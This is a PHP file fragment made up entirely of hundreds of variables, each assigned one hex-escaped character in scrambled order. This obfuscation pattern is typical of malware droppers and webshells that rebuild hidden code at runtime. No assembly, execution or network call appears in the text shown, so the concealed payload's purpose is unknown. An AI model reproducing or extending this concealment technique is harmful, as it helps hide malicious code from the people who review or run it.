$qdq1683="\x3d";
$qdq1422="\x6e";$qdq153="\x0a";$qdq1075="\x3b";$qdq1078="\x0a";
$qdq75="\x65";$qdq1609="\x20";$qdq958="\x64";$qdq1080="\x72";$qdq946="\x69";$qdq48="\x53";$qdq270="\x66";$qdq167="\x68";$qdq847="\x6d";$qdq846="\x61";$qdq96="\x20";$qdq573="\x24";$qdq462="\x65";$qdq1715="\x0a";$qdq781="\x29";$qdq1387="\x7b";$qdq1190="\x72";$qdq604="\x24";$qdq1601="\x29";
$qdq243="\x74";
$qdq651="\x29";$qdq152="\x7b";$qdq1113="\x65";$qdq1118="\x75";$qdq806="\x75";$qdq998="\x72";$qdq1580="\x29";$qdq46="\x39";
$qdq425="\x69";$qdq260="\x61";$qdq491="\x72";$qdq766="\x20";
$qdq1521="\x74";$qdq1294="\x73";$qdq1052="\x20";$qdq751="\x2e";
$qdq867="\x24";$qdq1131="\x24";$qdq812="\x65";$qdq321="\x30";$qdq872="\x24";$qdq1299="\x61";$qdq863="\x20";$qdq41="\x29";$qdq106="\x73";$qdq184="\x0a";$qdq960="\x32";$qdq1222="\x6a";
$qdq1058="\x76";$qdq1659="\x70";$qdq453="\x20";$qdq970="\x3d";$qdq1708="\x6c";$qdq1031="\x24";$qdq1662="\x6e";$qdq900="\x3d";$qdq1197="\x20";$qdq409="\x3b";$qdq1289="\x0a";$qdq913="\x65";$qdq133="\x73";$qdq1146="\x0a";
$qdq1531="\x6f";$qdq29="\x6e";
$qdq1465="\x69";$qdq30="\x67";$qdq508="\x6f";$qdq1495="\x6e";
$qdq1048="\x63";$qdq1013="\x0a";
$qdq1670="\x3b";$qdq693="\x22";$qdq53="\x74";$qdq337="\x63";$qdq1533="\x20";$qdq1418="\x74";
$qdq678="\x25";$qdq1550="\x69";
$qdq496="\x6c";$qdq383="\x69";
$qdq727="\x24";$qdq188="\x20";$qdq16="\x6c";
$qdq515="\x65";$qdq941="\x66";
$qdq36="\x6e";
$qdq182="\x30";$qdq64="\x72";$qdq848="\x65";$qdq1475="\x76";$qdq606="\x63";$qdq1267="\x24";$qdq22="\x20";$qdq957="\x6e";$qdq404="\x73";$qdq682="\x3d";$qdq529="\x65";$qdq1429="\x39";$qdq1594="\x72";$qdq199="\x28";$qdq255="\x75";$qdq498="\x20";$qdq474="\x23";$qdq536="\x66";$qdq387="\x29";$qdq578="\x6e";
$qdq1675="\x73";$qdq545="\x69";$qdq1704="\x0a";$qdq362="\x72";$qdq1323="\x74";$qdq1478="\x63";$qdq671="\x6e";
$qdq84="\x2d";$qdq1245="\x31";$qdq183="\x3b";
$qdq1384="\x69";$qdq1471="\x75";$qdq1701="\x6f";$qdq288="\x68";$qdq1660="\x72";$qdq350="\x7b";$qdq44="\x30";$qdq1426="\x30";$qdq210="\x73";$qdq1067="\x72";$qdq1163="\x61";$qdq421="\x6e";$qdq1408="\x66";$qdq911="\x61";
$qdq1432="\x29";$qdq568="\x20";$qdq135="\x64";$qdq1253="\x5d";$qdq859="\x24";$qdq1098="\x0a";$qdq1036="\x6e";$qdq1574="\x74";$qdq979="\x09";$qdq798="\x0a";$qdq745="\x6d";$qdq1311="\x0a";
$qdq504="\x63";$qdq939="\x20";$qdq1438="\x09";$qdq415="\x0a";$qdq181="\x20";$qdq385="\x20";$qdq999="\x5f";$qdq1684="\x22";$qdq1226="\x09";$qdq466="\x75";$qdq225="\x28";$qdq286="\x20";$qdq898="\x20";$qdq1202="\x29";
$qdq307="\x70";$qdq2="\x6d";$qdq456="\x20";$qdq1655="\x22";$qdq507="\x63";$qdq904="\x24";
$qdq685="\x5c";$qdq249="\x0a";
$qdq1562="\x77";
$qdq257="\x6c";$qdq1063="\x24";$qdq1269="\x5d";
$qdq408="\x69";$qdq1360="\x28";$qdq565="\x69";$qdq564="\x24";
$qdq1043="\x3b";$qdq635="\x3d";$qdq1283="\x69";$qdq595="\x67";$qdq1639="\x6e";$qdq80="\x74";$qdq38="\x20";$qdq1347="\x67";$qdq1038="\x6d";$qdq698="\x24";
$qdq558="\x73";
$qdq147="\x6f";$qdq586="\x61";$qdq612="\x20";
$qdq1110="\x79";$qdq454="\x6f";
$qdq1374="\x20";$qdq952="\x6e";$qdq424="\x6d";
$qdq511="\x20";$qdq888="\x7b";$qdq1388="\x0a";
$qdq254="\x62";$qdq809="\x74";
$qdq1204="\x0a";
$qdq677="\x24";$qdq294="\x75";$qdq469="\x6c";$qdq391="\x09";$qdq712="\x64";
$qdq804="\x6c";$qdq520="\x69";$qdq844="\x5f";$qdq1703="\x3b";$qdq1451="\x6e";$qdq1273="\x40";$qdq1665="\x4f";$qdq966="\x29";$qdq1358="\x72";$qdq778="\x28";$qdq587="\x6e";$qdq770="\x69";$qdq1055="\x20";$qdq996="\x76";$qdq1447="\x73";$qdq1433="\x3b";$qdq1158="\x20";$qdq616="\x0a";
$qdq313="\x72";$qdq1154="\x79";$qdq1539="\x20";$qdq82="\x6f";
$qdq1252="\x69";$qdq992="\x24";
$qdq1179="\x79";$qdq592="\x72";$qdq915="\x2e";$qdq301="\x65";
$qdq1338="\x6d";$qdq1603="\x0a";$qdq206="\x64";$qdq447="\x20";$qdq779="\x32";$qdq1494="\x6f";
$qdq862="\x3d";$qdq1343="\x74";$qdq318="\x20";$qdq1088="\x6d";$qdq175="\x79";$qdq130="\x76";$qdq1276="\x32";$qdq1676="\x65";$qdq1136="\x24";
$qdq1480="\x64";$qdq189="\x40";$qdq628="\x30";
$qdq830="\x6f";
$qdq951="\x69";$qdq1275="\x61";$qdq1153="\x6d";$qdq112="\x72";$qdq83="\x6e";$qdq426="\x7a";$qdq344="\x2b";$qdq160="\x6f";$qdq1648="\x65";$qdq786="\x29";$qdq208="\x78";$qdq1663="\x74";$qdq1049="\x6f";$qdq1265="\x2c";$qdq1177="\x09";$qdq1314="\x79";$qdq1099="\x73";$qdq1373="\x69";$qdq1183="\x20";
$qdq615="\x3b";$qdq52="\x73";$qdq721="\x2c";$qdq195="\x74";$qdq17="\x20";$qdq543="\x63";$qdq1516="\x65";$qdq45="\x30";$qdq1380="\x20";$qdq223="\x6e";$qdq890="\x09";$qdq187="\x79";$qdq1238="\x5d";
$qdq667="\x73";
$qdq338="\x6f";$qdq246="\x6e";$qdq1195="\x24";
$qdq132="\x72";
$qdq1508="\x70";
$qdq229="\x65";$qdq1486="\x61";$qdq47="\x20";
$qdq217="\x0a";$qdq1264="\x69";$qdq1364="\x24";$qdq1378="\x6c";$qdq1261="\x32";$qdq920="\x22";
$qdq1482="\x2c";$qdq1129="\x20";$qdq227="\x69";$qdq734="\x5b";
$qdq451="\x63";$qdq945="\x24";
$qdq989="\x20";
$qdq1212="\x69";$qdq916="\x22";
$qdq296="\x6c";$qdq1472="\x72";$qdq443="\x6b";
$qdq767="\x25";$qdq9="\x61";$qdq1074="\x22";$qdq1145="\x3b";$qdq1024="\x20";$qdq933="\x3d";$qdq588="\x64";$qdq284="\x72";$qdq54="\x69";
$qdq1305="\x72";$qdq12="\x20";$qdq411="\x09";
$qdq1221="\x24";$qdq937="\x6e";$qdq390="\x09";$qdq713="\x65";$qdq978="\x0a";$qdq258="\x64";$qdq1208="\x65";$qdq1632="\x68";
$qdq1624="\x6d";$qdq287="\x77";$qdq1086="\x20";$qdq720="\x5d";
$qdq709="\x24";$qdq935="\x22";$qdq274="\x65";$qdq358="\x20";$qdq949="\x20";$qdq215="\x29";$qdq828="\x6d";$qdq5="\x65";$qdq1079="\x09";$qdq836="\x20";$qdq1056="\x22";
$qdq1255="\x0a";
$qdq845="\x6e";$qdq928="\x6f";$qdq470="\x65";$qdq102="\x69";
$qdq656="\x09";$qdq1602="\x3b";$qdq434="\x74";$qdq640="\x63";
$qdq975="\x0a";$qdq723="\x6f";$qdq1191="\x61";$qdq519="\x66";
$qdq1217="\x20";$qdq1699="\x74";$qdq317="\x69";$qdq680="\x25";$qdq1557="\x73";$qdq1351="\x22";
$qdq124="\x66";$qdq467="\x66";$qdq1540="\x74";$qdq1608="\x74";$qdq346="\x24";
$qdq1527="\x6f";$qdq618="\x66";$qdq548="\x2c";$qdq1085="\x6e";$qdq1393="\x74";$qdq1488="\x73";$qdq1386="\x20";
$qdq1266="\x20";$qdq1392="\x73";$qdq487="\x63";$qdq145="\x61";$qdq297="\x64";$qdq1661="\x69";$qdq1362="\x79";$qdq982="\x63";$qdq1687="\x22";$qdq695="\x22";$qdq1396="\x6e";$qdq339="\x64";
$qdq1176="\x09";$qdq1515="\x67";
$qdq342="\x3b";$qdq577="\x5f";
$qdq789="\x3d";$qdq1607="\x6e";
$qdq293="\x62";$qdq665="\x3d";
$qdq580="\x6d";$qdq212="\x3d";
$qdq1611="\x6e";$qdq1050="\x64";
$qdq994="\x2e";$qdq1062="\x5c";$qdq107="\x20";
$qdq1367="\x3d";$qdq1398="\x20";$qdq756="\x6e";
$qdq214="\x28";$qdq241="\x72";$qdq403="\x65";$qdq599="\x0a";$qdq1232="\x24";$qdq1149="\x6f";$qdq1406="\x6e";$qdq272="\x74";$qdq384="\x2c";$qdq669="\x72";
$qdq1419="\x28";$qdq460="\x20";
$qdq204="\x69";$qdq369="\x75";$qdq1407="\x74";$qdq295="\x69";
$qdq1469="\x65";$qdq232="\x25";$qdq1148="\x66";$qdq516="\x72";$qdq1258="\x40";
$qdq436="\x61";
$qdq416="\x09";$qdq1095="\x7d";
$qdq269="\x6f";$qdq1165="\x3b";$qdq788="\x3d";$qdq282="\x74";
$qdq253="\x20";
$qdq1666="\x20";$qdq1170="\x69";$qdq176="\x20";
$qdq572="\x09";$qdq1123="\x0a";
$qdq1713="\x3b";$qdq351="\x0a";
$qdq23="\x6d";
$qdq1455="\x7d";$qdq1514="\x20";$qdq19="\x6f";$qdq7="\x70";$qdq729="\x63";$qdq1680="\x0a";$qdq1629="\x6f";
$qdq760="\x66";$qdq429="\x73";$qdq1394="\x72";$qdq1037="\x61";$qdq193="\x69";$qdq549="\x20";$qdq730="\x72";
$qdq1355="\x09";$qdq1644="\x24";$qdq563="\x09";$qdq359="\x40";$qdq1688="\x3b";$qdq1357="\x6f";
$qdq118="\x61";$qdq1076="\x0a";$qdq535="\x66";
$qdq1622="\x22";$qdq1390="\x09";$qdq710="\x69";$qdq611="\x3d";
$qdq427="\x65";$qdq340="\x65";$qdq777="\x64";$qdq1444="\x6e";$qdq1167="\x2d";$qdq1206="\x09";$qdq1577="\x6c";$qdq553="\x6e";
$qdq1003="\x65";$qdq93="\x6e";$qdq1686="\x63";$qdq164="\x3d";$qdq1248="\x6a";$qdq65="\x0a";$qdq1657="\x3b";$qdq15="\x72";$qdq1640="\x61";$qdq768="\x20";
$qdq4="\x72";$qdq884="\x24";$qdq691="\x78";$qdq597="\x29";$qdq379="\x65";$qdq1389="\x09";$qdq707="\x2c";$qdq1152="\x28";$qdq275="\x20";$qdq1361="\x6d";
$qdq374="\x28";
$qdq37="\x65";$qdq793="\x3b";
$qdq1322="\x6e";$qdq1668="\x6e";
$qdq1497="\x79";
$qdq87="\x76";$qdq1544="\x63";$qdq652="\x20";$qdq1664="\x20";$qdq1420="\x72";$qdq1298="\x72";
$qdq1633="\x2d";$qdq1156="\x24";$qdq627="\x20";$qdq1071="\x6d";
$qdq1436="\x7d";$qdq601="\x6d";
$qdq1696="\x65";$qdq681="\x64";
$qdq352="\x09";$qdq433="\x70";$qdq412="\x7d";$qdq874="\x73";$qdq690="\x32";$qdq512="\x6c";$qdq1617="\x65";$qdq1279="\x6a";$qdq813="\x76";$qdq794="\x0a";$qdq377="\x6f";$qdq566="\x20";$qdq1143="\x40";$qdq1125="\x0a";$qdq1589="\x65";$qdq476="\x74";$qdq1337="\x09";$qdq725="\x64";$qdq676="\x5c";
$qdq26="\x70";
$qdq605="\x6d";$qdq1590="\x74";$qdq1040="\x27";$qdq123="\x65";
$qdq903="\x5c";$qdq1200="\x31";
$qdq1579="\x3a";$qdq1467="\x20";
$qdq987="\x2e";$qdq1561="\x6f";
$qdq1460="\x74";$qdq1263="\x24";$qdq801="\x20";$qdq399="\x6e";$qdq1233="\x69";$qdq1302="\x5f";$qdq877="\x69";$qdq501="\x72";$qdq765="\x69";$qdq790="\x20";$qdq485="\x65";
$qdq1570="\x6f";$qdq1220="\x20";$qdq910="\x6e";$qdq305="\x72";$qdq128="\x72";$qdq1599="\x24";$qdq486="\x20";
$qdq897="\x65";$qdq855="\x6f";$qdq248="\x3b";$qdq1443="\x72";$qdq594="\x6e";$qdq56="\x6e";$qdq1242="\x40";$qdq1155="\x20";$qdq795="\x09";$qdq762="\x28";$qdq1628="\x6d";$qdq1196="\x69";$qdq174="\x6d";$qdq1630="\x72";$qdq973="\x29";$qdq1667="\x24";$qdq776="\x6e";$qdq944="\x28";$qdq938="\x22";$qdq658="\x6d";$qdq538="\x65";$qdq1345="\x69";
$qdq1218="\x3d";$qdq55="\x61";$qdq1652="\x69";$qdq1198="\x2b";$qdq1047="\x6d";$qdq1350="\x20";$qdq1102="\x20";$qdq1288="\x7d";$qdq746="\x63";$qdq482="\x6f";$qdq280="\x61";$qdq230="\x28";$qdq650="\x69";
$qdq1025="\x22";
$qdq886="\x29";$qdq121="\x20";
$qdq259="\x20";$qdq177="\x24";$qdq171="\x3b";$qdq909="\x5f";$qdq483="\x20";$qdq1157="\x69";$qdq1498="\x20";$qdq228="\x6d";$qdq105="\x74";$qdq620="\x72";
$qdq303="\x73";$qdq490="\x20";$qdq1354="\x0a";$qdq774="\x72";
$qdq502="\x72";$qdq1160="\x20";$qdq732="\x70";$qdq209="\x65";$qdq757="\x22";$qdq1023="\x3d";
$qdq1383="\x24";$qdq35="\x69";$qdq180="\x3d";$qdq552="\x69";$qdq1705="\x65";$qdq1291="\x0a";
$qdq1339="\x79";$qdq1243="\x24";
$qdq472="\x0a";$qdq263="\x61";$qdq101="\x72";$qdq122="\x6c";$qdq1595="\x70";
$qdq166="\x73";$qdq1352="\x22";$qdq1210="\x74";$qdq754="\x22";$qdq1647="\x6e";$qdq1391="\x24";
$qdq834="\x2e";$qdq551="\x40";$qdq402="\x78";
$qdq326="\x20";
$qdq1270="\x20";$qdq1262="\x5b";$qdq1409="\x28";$qdq705="\x6d";$qdq771="\x6e";$qdq1130="\x28";$qdq348="\x29";
$qdq1064="\x24";$qdq509="\x64";$qdq761="\x20";$qdq1424="\x28";$qdq1604="\x70";$qdq673="\x66";$qdq1445="\x20";
$qdq829="\x63";$qdq173="\x09";$qdq826="\x09";$qdq10="\x72";$qdq114="\x65";$qdq1215="\x24";$qdq764="\x24";$qdq825="\x0a";$qdq625="\x20";$qdq92="\x6f";$qdq1330="\x33";$qdq540="\x5c";$qdq463="\x20";$qdq1415="\x20";$qdq33="\x6e";
$qdq672="\x74";$qdq163="\x20";$qdq329="\x6c";$qdq455="\x6e";
$qdq1547="\x65";$qdq1363="\x20";
$qdq1649="\x72";$qdq976="\x09";
$qdq239="\x6e";$qdq401="\x65";$qdq822="\x69";$qdq1510="\x74";
$qdq322="\x3b";$qdq72="\x74";$qdq285="\x73";$qdq1041="\x3b";
$qdq14="\x65";$qdq797="\x0a";$qdq799="\x09";$qdq1416="\x69";$qdq1117="\x68";$qdq1124="\x7b";
$qdq43="\x32";$qdq1597="\x28";$qdq763="\x28";$qdq392="\x70";$qdq868="\x69";$qdq621="\x20";$qdq1007="\x2e";$qdq1536="\x6e";
$qdq630="\x20";$qdq514="\x74";$qdq1450="\x69";$qdq395="\x68";$qdq1428="\x2b";$qdq1484="\x6d";$qdq419="\x72";$qdq1004="\x2e";$qdq1092="\x65";$qdq638="\x23";$qdq221="\x72";$qdq1706="\x76";
$qdq881="\x20";$qdq1287="\x09";$qdq784="\x29";$qdq1587="\x20";$qdq931="\x20";$qdq375="\x24";
$qdq156="\x79";$qdq50="\x62";$qdq1399="\x2e";$qdq995="\x24";$qdq386="\x31";
$qdq739="\x29";$qdq1319="\x3d";$qdq1249="\x2c";$qdq1559="\x67";$qdq500="\x6f";$qdq559="\x29";$qdq590="\x73";$qdq1379="\x3b";$qdq1501="\x6e";
$qdq1281="\x20";$qdq435="\x20";$qdq438="\x72";$qdq963="\x2b";$qdq157="\x20";$qdq544="\x72";$qdq3="\x6f";
$qdq1090="\x6f";
$qdq1034="\x72";$qdq1534="\x73";$qdq1413="\x22";$qdq1097="\x0a";$qdq1032="\x76";$qdq27="\x68";$qdq993="\x22";$qdq1511="\x65";$qdq1462="\x69";$qdq792="\x29";$qdq1175="\x0a";
$qdq873="\x23";$qdq550="\x5c";$qdq1551="\x7a";$qdq477="\x68";$qdq530="\x73";$qdq1328="\x64";$qdq222="\x61";$qdq942="\x20";$qdq977="\x7d";
$qdq1128="\x79";$qdq1304="\x74";$qdq1359="\x20";$qdq1205="\x09";$qdq376="\x63";$qdq1712="\x63";$qdq787="\x20";$qdq1325="\x72";$qdq155="\x6d";$qdq1214="\x20";$qdq596="\x28";$qdq161="\x64";$qdq653="\x7b";$qdq1538="\x65";$qdq499="\x63";$qdq737="\x5d";$qdq86="\x20";$qdq1566="\x20";
$qdq571="\x0a";$qdq991="\x5c";
$qdq1372="\x24";$qdq1542="\x65";$qdq370="\x62";$qdq617="\x09";
$qdq1382="\x2b";$qdq742="\x09";$qdq57="\x20";$qdq226="\x74";$qdq821="\x72";$qdq1430="\x37";$qdq666="\x20";$qdq598="\x3b";$qdq126="\x73";$qdq1227="\x40";$qdq990="\x22";$qdq396="\x20";$qdq367="\x20";$qdq722="\x20";$qdq827="\x24";$qdq334="\x68";$qdq1280="\x2c";$qdq843="\x72";$qdq1479="\x6f";$qdq66="\x23";$qdq1700="\x69";$qdq109="\x65";$qdq1366="\x20";$qdq1674="\x6f";
$qdq622="\x28";$qdq468="\x66";$qdq1552="\x65";$qdq381="\x20";
$qdq1207="\x6e";$qdq1042="\x22";$qdq423="\x6f";
$qdq1254="\x3b";$qdq1572="\x65";
$qdq265="\x72";$qdq1619="\x28";$qdq1397="\x67";
$qdq136="\x2e";$qdq1162="\x24";
$qdq85="\x31";$qdq216="\x3b";
$qdq686="\x5c";$qdq139="\x75";$qdq134="\x65";$qdq97="\x41";$qdq247="\x29";$qdq838="\x5c";$qdq1015="\x24";$qdq1230="\x31";
$qdq589="\x5f";$qdq1054="\x3d";$qdq1138="\x32";$qdq361="\x63";
$qdq251="\x09";$qdq1463="\x73";$qdq1126="\x09";$qdq1509="\x75";$qdq668="\x70";$qdq815="\x6c";$qdq1081="\x65";$qdq1340="\x20";
$qdq664="\x2e";
$qdq480="\x20";$qdq1135="\x20";$qdq1282="\x24";$qdq1549="\x73";$qdq567="\x3d";$qdq1051="\x65";$qdq930="\x65";$qdq191="\x63";$qdq372="\x74";$qdq70="\x6e";$qdq1028="\x63";
$qdq1116="\x73";$qdq1395="\x69";$qdq316="\x24";$qdq1448="\x74";
$qdq632="\x69";$qdq267="\x79";$qdq1348="\x20";
$qdq1324="\x28";$qdq1001="\x61";$qdq382="\x24";$qdq569="\x30";$qdq837="\x22";$qdq1697="\x72";$qdq1301="\x64";$qdq360="\x73";$qdq706="\x65";
$qdq1240="\x3d";$qdq1507="\x6d";$qdq629="\x3b";$qdq1331="\x29";
$qdq138="\x73";$qdq1274="\x24";$qdq244="\x69";$qdq356="\x73";
$qdq478="\x65";$qdq406="\x20";$qdq194="\x70";$qdq1627="\x61";$qdq654="\x0a";$qdq1139="\x29";$qdq924="\x09";$qdq769="\x28";
$qdq1473="\x73";$qdq892="\x24";$qdq1625="\x65";$qdq1297="\x20";
$qdq1246="\x5b";$qdq1522="\x69";$qdq1310="\x7b";$qdq736="\x69";
$qdq394="\x73";$qdq947="\x20";
$qdq333="\x74";$qdq556="\x78";$qdq380="\x2c";$qdq906="\x76";$qdq1256="\x09";$qdq1425="\x32";$qdq1168="\x2d";$qdq276="\x63";
$qdq752="\x3d";$qdq1166="\x20";$qdq186="\x6d";$qdq1653="\x6f";
$qdq608="\x64";$qdq816="\x28";
$qdq1020="\x65";$qdq111="\x65";$qdq997="\x61";$qdq1693="\x67";$qdq1573="\x6e";$qdq1439="\x72";$qdq25="\x72";
$qdq252="\x23";
$qdq961="\x30";$qdq1306="\x69";
$qdq127="\x20";$qdq891="\x09";$qdq1318="\x20";$qdq783="\x31";$qdq74="\x67";$qdq141="\x20";
$qdq238="\x65";$qdq1313="\x6d";$qdq407="\x24";$qdq441="\x2c";$qdq234="\x24";$qdq733="\x74";
$qdq726="\x28";$qdq218="\x0a";$qdq718="\x24";$qdq242="\x61";$qdq526="\x79";$qdq842="\x61";
$qdq962="\x29";$qdq1581="\x0a";$qdq1440="\x65";$qdq198="\x20";$qdq1134="\x2c";$qdq1235="\x20";$qdq168="\x69";$qdq1187="\x6e";$qdq1365="\x69";$qdq687="\x78";$qdq129="\x65";$qdq1008="\x22";$qdq831="\x64";$qdq1691="\x2b";
$qdq634="\x3c";
$qdq347="\x69";$qdq547="\x74";$qdq782="\x2b";$qdq956="\x61";$qdq1411="\x25";$qdq1224="\x0a";$qdq73="\x20";$qdq641="\x72";$qdq1496="\x6c";$qdq1709="\x20";$qdq345="\x2b";$qdq755="\x5c";$qdq493="\x62";$qdq758="\x20";$qdq914="\x22";$qdq464="\x73";$qdq889="\x0a";$qdq1575="\x69";$qdq899="\x2e";$qdq357="\x68";$qdq853="\x09";$qdq1173="\x20";$qdq1084="\x72";
$qdq521="\x73";$qdq1476="\x65";$qdq1499="\x63";$qdq692="\x5c";$qdq1434="\x0a";
$qdq1171="\x3b";$qdq907="\x61";$qdq67="\x20";$qdq103="\x67";$qdq331="\x6e";
$qdq299="\x74";$qdq714="\x78";$qdq1039="\x65";
$qdq475="\x20";$qdq585="\x72";
$qdq985="\x65";$qdq489="\x6e";$qdq896="\x64";$qdq860="\x69";$qdq517="\x0a";$qdq289="\x69";$qdq1223="\x3b";
$qdq20="\x64";$qdq741="\x0a";
$qdq1612="\x63";$qdq277="\x68";$qdq964="\x31";$qdq1059="\x61";$qdq98="\x6c";
$qdq1376="\x20";$qdq1122="\x65";$qdq1309="\x0a";$qdq925="\x24";$qdq245="\x6f";
$qdq1308="\x67";$qdq684="\x22";$qdq446="\x70";$qdq371="\x73";$qdq1423="\x64";$qdq471="\x64";$qdq639="\x73";$qdq728="\x73";$qdq851="\x3b";$qdq696="\x2c";
$qdq1375="\x3c";$qdq533="\x68";$qdq1259="\x24";$qdq237="\x67";$qdq1466="\x73";$qdq1="\x20";
$qdq62="\x6d";$qdq262="\x20";$qdq1487="\x6e";$qdq428="\x20";$qdq663="\x20";$qdq40="\x43";$qdq955="\x72";$qdq169="\x66";
$qdq852="\x0a";$qdq570="\x3b";$qdq716="\x73";$qdq1576="\x61";
$qdq1070="\x61";$qdq918="\x69";
$qdq1537="\x63";$qdq1605="\x72";$qdq1545="\x6f";
$qdq497="\x64";$qdq142="\x6d";$qdq700="\x61";
$qdq69="\x6f";$qdq554="\x64";$qdq1506="\x6f";$qdq1512="\x20";
$qdq90="\x73";$qdq158="\x24";
$qdq1654="\x6e";$qdq575="\x61";$qdq1315="\x20";
$qdq1046="\x24";$qdq479="\x6d";$qdq100="\x20";$qdq21="\x65";$qdq661="\x64";$qdq68="\x63";$qdq236="\x24";$qdq1174="\x7b";$qdq534="\x75";$qdq926="\x6d";
$qdq1121="\x6c";$qdq1593="\x6f";
$qdq300="\x68";
$qdq1303="\x73";$qdq1030="\x27";
$qdq1645="\x67";$qdq740="\x3b";$qdq1695="\x6e";$qdq623="\x24";
$qdq1211="\x20";$qdq679="\x73";$qdq724="\x72";$qdq320="\x20";$qdq1563="\x69";$qdq819="\x73";
$qdq839="\x24";$qdq8="\x65";$qdq312="\x6f";$qdq1591="\x61";$qdq1610="\x24";$qdq1312="\x09";
$qdq1517="\x6e";$qdq398="\x69";$qdq974="\x3b";$qdq808="\x61";
$qdq717="\x5b";$qdq1637="\x72";$qdq840="\x24";$qdq150="\x68";$qdq1201="\x29";
$qdq1369="\x30";$qdq1543="\x20";$qdq609="\x65";$qdq290="\x63";$qdq1219="\x3d";
$qdq279="\x72";$qdq1532="\x2c";$qdq1356="\x66";$qdq1109="\x5f";$qdq31="\x20";$qdq1454="\x0a";
$qdq1569="\x70";$qdq159="\x63";$qdq659="\x63";$qdq633="\x20";$qdq1112="\x74";$qdq1107="\x65";$qdq1377="\x24";
$qdq353="\x09";$qdq1571="\x6e";$qdq400="\x64";$qdq1014="\x09";$qdq273="\x68";$qdq527="\x61";$qdq791="\x30";$qdq1021="\x20";$qdq1342="\x73";$qdq1385="\x29";$qdq1144="\x5f";
$qdq655="\x09";$qdq1690="\x2b";$qdq803="\x61";$qdq670="\x69";$qdq541="\x40";$qdq410="\x0a";
$qdq1108="\x72";$qdq113="\x76";$qdq582="\x20";$qdq405="\x2c";$qdq1089="\x63";$qdq1458="\x23";$qdq192="\x72";$qdq619="\x6f";$qdq631="\x24";$qdq51="\x61";$qdq95="\x23";$qdq330="\x65";$qdq42="\x20";$qdq820="\x74";$qdq1271="\x3d";
$qdq418="\x20";$qdq1292="\x0a";$qdq814="\x61";$qdq1009="\x3b";$qdq1481="\x65";$qdq431="\x72";$qdq1553="\x0a";$qdq560="\x3b";$qdq1336="\x0a";$qdq1702="\x6e";$qdq1621="\x2c";$qdq719="\x69";$qdq1613="\x3b";$qdq602="\x79";$qdq1317="\x6c";$qdq283="\x65";$qdq278="\x61";$qdq1656="\x29";$qdq1002="\x6d";$qdq1137="\x61";$qdq1528="\x72";$qdq988="\x3d";$qdq1132="\x61";$qdq584="\x20";$qdq34="\x67";$qdq1065="\x76";$qdq1300="\x6e";$qdq354="\x70";
$qdq731="\x69";$qdq849="\x3d";$qdq1485="\x65";$qdq697="\x20";$qdq510="\x65";$qdq1272="\x20";$qdq984="\x64";$qdq1180="\x20";$qdq1669="\x63";$qdq1172="\x29";
$qdq1140="\x20";
$qdq1568="\x78";
$qdq1335="\x3b";$qdq1225="\x09";$qdq805="\x63";$qdq715="\x65";$qdq953="\x74";
$qdq110="\x73";$qdq1636="\x61";$qdq603="\x20";
$qdq115="\x64";
$qdq1239="\x20";$qdq1565="\x67";
$qdq704="\x61";$qdq600="\x09";$qdq1584="\x63";$qdq144="\x74";$qdq185="\x09";$qdq488="\x61";$qdq202="\x20";$qdq1278="\x24";$qdq657="\x24";$qdq1142="\x20";
$qdq125="\x74";$qdq1022="\x2e";
$qdq1181="\x24";$qdq856="\x72";$qdq1120="\x66";$qdq1199="\x20";$qdq1519="\x72";$qdq308="\x74";
$qdq1286="\x0a";$qdq818="\x20";$qdq81="\x69";$qdq1101="\x62";$qdq643="\x70";$qdq1452="\x67";$qdq1327="\x6e";$qdq857="\x20";$qdq880="\x3b";$qdq440="\x79";$qdq473="\x09";
$qdq940="\x69";
$qdq1412="\x63";$qdq864="\x30";$qdq876="\x72";
$qdq1150="\x72";
$qdq1437="\x0a";$qdq190="\x73";$qdq77="\x65";$qdq1349="\x3d";$qdq523="\x65";$qdq1707="\x61";$qdq965="\x29";$qdq327="\x3c";
$qdq649="\x24";$qdq932="\x2e";
$qdq94="\x0a";$qdq1368="\x20";$qdq1556="\x69";$qdq1518="\x65";$qdq835="\x3d";$qdq647="\x2b";$qdq1353="\x3b";$qdq1453="\x3b";$qdq562="\x0a";$qdq1094="\x0a";$qdq747="\x6f";$qdq923="\x09";$qdq457="\x68";$qdq624="\x69";
$qdq99="\x6c";$qdq1634="\x24";$qdq1268="\x6a";
$qdq271="\x20";
$qdq1236="\x24";$qdq1435="\x09";$qdq1682="\x63";$qdq172="\x0a";$qdq60="\x61";$qdq1285="\x3b";$qdq823="\x6e";$qdq119="\x6c";$qdq927="\x63";$qdq63="\x65";
$qdq1596="\x68";$qdq869="\x20";
$qdq266="\x61";$qdq151="\x0a";$qdq200="\x29";$qdq1583="\x6e";$qdq1677="\x20";$qdq1329="\x28";$qdq1096="\x0a";$qdq179="\x20";$qdq1681="\x24";$qdq207="\x65";
$qdq1234="\x2c";$qdq1104="\x69";
$qdq1061="\x20";
$qdq140="\x62";$qdq1293="\x0a";$qdq875="\x63";$qdq414="\x0a";$qdq694="\x3b";$qdq749="\x65";$qdq79="\x61";$qdq1711="\x6e";$qdq1529="\x20";$qdq364="\x70";$qdq341="\x29";
$qdq645="\x3b";$qdq1524="\x6e";$qdq250="\x0a";$qdq1213="\x66";$qdq1492="\x75";$qdq708="\x20";$qdq1068="\x5f";
$qdq448="\x74";$qdq76="\x6e";$qdq1164="\x31";
$qdq1606="\x69";$qdq1457="\x0a";
$qdq711="\x6e";$qdq417="\x23";$qdq1523="\x6f";$qdq1159="\x3d";
$qdq1000="\x6e";$qdq1346="\x6e";$qdq1567="\x65";$qdq219="\x09";
$qdq969="\x3d";$qdq971="\x20";$qdq11="\x6c";$qdq591="\x74";$qdq1650="\x61";$qdq1710="\x24";$qdq197="\x3d";$qdq948="\x25";
$qdq1044="\x0a";$qdq444="\x65";$qdq528="\x74";$qdq894="\x63";$qdq1016="\x6d";$qdq555="\x65";$qdq1520="\x61";$qdq879="\x74";$qdq1402="\x73";$qdq785="\x29";$qdq1489="\x20";$qdq644="\x74";
$qdq1185="\x20";$qdq703="\x6e";$qdq576="\x72";$qdq495="\x69";$qdq1470="\x63";
$qdq750="\x20";
$qdq343="\x20";$qdq355="\x75";
$qdq593="\x69";$qdq146="\x6d";$qdq1060="\x6c";$qdq1431="\x29";
$qdq1646="\x65";$qdq117="\x20";
$qdq972="\x30";$qdq104="\x68";$qdq413="\x0a";$qdq557="\x65";$qdq1598="\x24";$qdq1082="\x74";$qdq0="\x23";$qdq648="\x2b";
$qdq1679="\x3b";$qdq1464="\x20";$qdq748="\x64";$qdq1503="\x23";$qdq522="\x68";$qdq1251="\x24";
$qdq1033="\x61";
